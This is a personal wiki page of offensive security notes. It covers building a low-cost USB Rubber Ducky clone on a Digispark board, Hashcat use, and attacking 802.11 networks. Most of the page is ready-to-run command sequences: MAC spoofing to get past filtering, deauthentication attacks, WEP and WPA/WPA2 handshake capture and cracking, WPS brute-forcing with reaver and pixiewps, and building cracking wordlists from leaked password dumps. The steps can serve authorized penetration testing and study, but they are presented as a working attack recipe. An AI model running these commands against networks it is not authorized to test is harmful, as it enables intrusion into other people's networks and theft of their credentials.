# Offensive ## Rubber Ducky Screw the $45~ thing, we're making our own for $1.15~. https://hackernoon.com/low-cost-usb-rubber-ducky-pen-test-tool-for-3-using-digispark-and-duck2spark-5d59afc1910 https://github.com/PlatyPew/Digispark-Duckduino https://github.com/mame82/duck2spark https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payloads Open Arduino IDE; File -> Preferences -> Additional Boards Manager URLs http://digistump.com/package_digistump_index.json Tools -> Board -> Boards Manager -> Digistump AVR Boards - install it. ```bash # cat > /etc/udev/rules.d/49-micronucleus.rules << EOF SUBSYSTEMS=="usb", ATTRS{idVendor}=="16d0", ATTRS{idProduct}=="0753", MODE:="0666" KERNEL=="ttyACM*", ATTRS{idVendor}=="16d0", ATTRS{idProduct}=="0753", MODE:="0666", ENV{ID_MM_DEVICE_IGNORE}="1" EOF reboot ``` You can now flash stuff to the board by selecting it as 'Digispark Default 16.5mhz'. Do not plug the board before compiling process, do it after when you'll be prompted. ``` ## This seems not needed anymore as the AVR package ships up to date micronucleus, and the project stopped providing precompiled linux library? #git clone https://github.com/micronucleus/micronucleus.git #cp ~/micronucleus/commandline/micronucleus /home/c0rn3j/.arduino15/packages/digistump/tools/micronucleus ``` ## General http://tools.kali.org/tools-listing ## Hashcat Hashcat is a tool to crack various hashes, passwords and other formats. Hashcat is now merged into one OpenCL version(used to have a CUDA version for nvidia GPUs- CudaHashcat, the new hashcat only supports OpenCL). For WPA2 it uses a new(2017) format called [hccapx](https://hashcat.net/cap2hccapx/). ## Attacking 802.11 [[1]](https://www.youtube.com/watch?v=_2EJkZfUM2g) [[2]](https://www.youtube.com/watch?v=tzfcOAWQGU4) [[3]](https://www.youtube.com/watch?v=6qKlpK_XRtg) http://tools.kali.org/wireless-attacks/mdk3 ### Preparation: Packages: aircrack-ng wireshark-qt macchanger [reaver-wps-fork-t6x](https://github.com/t6x/reaver-wps-fork-t6x) --- Kill your network manager service to avoid it interfering. I am using NetworkManager. **sudo systemctl stop NetworkManager** - sometimes it starts again so just try this twice... Then use **sudo airmon-ng** to find out your interface name for the wireless card you want to use. If it is not listed, you are either lacking drivers or it is not compatible. After finding out your interface name, turn your WLAN card into monitor mode with **sudo airmon-ng start _yourInterface_**, you will then have a **_yourInterface_mon** interface you can use. You can use the **–verbose** flag with the command to diagnose possible issues if it is not working as intended. You can use **stop** instead of **start** to make the interface go back to managed mode and use wi-fi as usual. Since the default interface tends to be **_wlp8s0_**, that is what I am going to use for this page. --- Change your MAC: **ip link set dev wlp8s0 down** - bring the interface down so you can make changes to it **macchanger -r wlp8s0** - randomize MAC address completely. Alternatively use -m option and supply an address starting with 68:5D:43 or any other vendor specific address, as some routers and networks will not allow MAC that is not assigned to any vendor. (MAC is in this format XX:XX:XX:YY:YY:YY where XXXXXX is vendor specific and YYYYYY is random) **ip link set dev wlp8s0 up** ### Wifite There is a script called **wifite** that can do most of these attacks even if the attacker doesn't understand them. It fails in some more complicated cases. **git clone https://github.com/derv82/wifite** **cd wifite/** **sudo python2.7 ./wifite.py** ### Scan your surroundings **sudo airodump-ng wlp8s0mon** ### MAC address filtering Use airodump to look for an active client and change your MAC address to theirs. ### Hidden SSID aireplay-ng -0 0 -a 00:1F:1F:1F:1F:1F -c 00:1F:1F:1F:1F:1F --ignore-negative-one wlp8s0mon while running airodump. Successfully deauthing a client will make them broadcast the SSID in the clear because they'll have to reconnect. ### WEP airmon-ng start wlp8s0 airodump-ng wlp8s0mon airodump-ng -w wep -c CHANNEL --bssid BSSID wlp8s0mon aireplay-ng -1 0 -a BSSID wlp8s0mon aireplay-ng -3 -b BSSID wlp8s0mon aircrack-ng filename.cap ### WPA/WPA2-PSK airmon-ng start wlp8s0 airodump-ng wlp8s0mon airodump-ng -c _CHANNEL_ -w _filename_ --bssid _BSSID_ wlp8s0mon aireplay-ng -0 0 -a BSSID wlp8s0mon After obtaining 4-way handshake: aircrack-ng –w WORDLIST -b BSSID filename.cap ### WPA2-MGT MSCHAPv2 http://pastebin.com/CnJstqpH ### WPS Scan for WPS enabled APs **sudo wash -i _wlp8s0mon_** For Bruteforcing and logging for possible pixie attack. Use **-K 1** parameter to try pixiewps while reaver is running. The plain bruteforce attack might take minutes to days, but usually it's max 10 hours. **sudo reaver -i _wlp8s0mon_ -b _BSSID_ -c _channel_ -f -S -vvv -H** After obtaining at least one response you can use **pixiewps** to try the offline pixie attack. Whole pixiewps command will be saved in a text file if you supplied the -H command. Pixie attack takes anywhere from a second to 30 minutes, and only works if the router is vulnerable to it. ### Cracking a handshake/capture file #### Using GPU ``` Converting .cap to .hccapx ``` Use cap2hccapx (from the hashcat-utils package) **cap2hccapx capture.cap capture.hccapx** ``` HCCAP to password ``` **hashcat -m 2500 -w 1 filename.hccapx wordlist.txt** #### Using CPU IVS file crack aircrack-ng -a2 -b F8:8E:88:AA:FF:BB -w wordlist-final.txt ivsfile.ivs ## Other stuff Find out default gateway route -n ### Obtaining wordlists [hashes.org](https://hashes.org/public.php) have awesome leaked lists, so I'm going with a bunch these. You can find different lists on torrent trackers. **7z x xxx_found.7z -owordlists** - extract file into a folder called 'wordlists' **cat xxx_found_sorted.txt xxx_found_sorted.txt xxx_found_sorted.txt > mywordlist.txt** - join all lists into one **sed -r '/^.{,7}$/d' mywordlist.txt > WPAwordlist.txt** - remove everything that is 7 characters or less from the file and write that to a new file. WPA/2 does not accept less than 8 characters. **sort -T ~ -u WPAwordlist.txt > WPAwordlist_sorted.txt** - change temporary directory to the home directory(sort would fail on a big file if /tmp is too small) and sort into a new file